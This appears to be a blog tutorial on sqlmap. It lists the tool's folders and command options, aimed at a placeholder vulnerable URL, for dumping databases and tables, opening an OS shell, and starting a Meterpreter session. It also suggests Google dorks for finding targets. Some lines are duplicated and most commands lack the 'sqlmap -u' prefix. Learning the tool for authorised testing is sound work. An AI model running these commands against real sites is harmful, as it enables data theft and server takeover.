sqlmap
sqlmap

With SQLmap you can take over or dump full databases, can escalate privileges, bypass CSRF tokens, can detect XSS. It is very useful for parameter pollution or parameter fuzzing to bypass business logic. can process the google dorks which is good for finding the vulnerable target. Can process the google dorks which is good for finding the vulnerable target. Useful for banner grabbing, Crawling and fingerprinting of databases. The current version is based on Python 2 so 2.7 is required for further use. The user can download sqlmap from its official repository with below command or from here.

git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
sqlmap
sqlmap

Below is the Structure of SQLMAP

doc/ —> Official guide for using the tool which is must read before performing the operations.

extra/ —> Contains the default backdoors, ICMP Shell, Shellcode and other configuration files.

lib/ —> Libraries used in the tool to define injection techniques, parsing HTTP requests, importing the Metasploit module in sqlmap etc.

plugins/ —> Generic and specific database based scripts for grabbing file systems, databases, banners.

dbms/ —> User and database enumeration, fingerprinting scripts for different databases like oracle, mysql, Firebird etc.

shells/ –> asp, php, JSP, windows non-cloaked backdoors.

tamper/ –> Tamper scripts to bypass insecure inputs, web application firewalls. The user can define their own tamper scripts and modify sqlmap.

txt/ —> Inbuilt word lists, table names, column names, list of agents for enumeration.

UDF/ —> Files for binary injections for windows and linux platforms.

WAF/ —> Scripts to identify WAF, IPS/IDS like ModSecurity, Barracuda, Incapsula etc.

XML/ —> Payloads for different types of injections like error based, union based, time-based blind etc.

Generic operation of sqlmap

“http://www.site.com/vuln.php?id=1” -hh (Will list all available commands and its use)

“http://www.site.com/vuln.php?id=1” (Vulnerable target)

“http://www.site.com/vuln.php?id=1” –crawl (Will crawl the webiste from the start)

“http://www.site.com/vuln.php?id=1” -a (Will retrieve everything)

“http://www.site.com/vuln.php?id=1” –dbs (Will enumerate DBMS databases)

“http://www.site.com/vuln.php?id=1” -D [database name] –dump –random-agent –level=[1-5] –risk=[1-3] (Will dump specific databases got from above query with different agent and level forwarded with specific risk value)

“http://www.site.com/vuln.php?id=1” -D [database name] -T [table name] -C [Column name] –dump (Will dump specific columns from the table)

“http://www.site.com/vuln.php?id=1” -D [database name] -T [table name] -C [Column name] –dump (Will dump specific columns from the table)

“http://www.site.com/vuln.php?id=1” -D [database name] –sqlmap-shell (Will prompt for sqlmap shell)

Advance Operation of sqlmap

http://www.site.com/vuln.php?id=1″ -D [database name] –os-shell (Will upload stager on webserver and prompt for operating system shell if vulnerable)

“http://www.site.com/vuln.php?id=1” -D [database name] –msf-path=[MSFPATH] –os-pwn (Will prompt for meterpreter which requires metasploit-framework working directory)

-r request.txt -p [parameter name] (Will process http request with specified parameter.)

LEAVE A REPLY

Please enter your comment!
Please enter your name here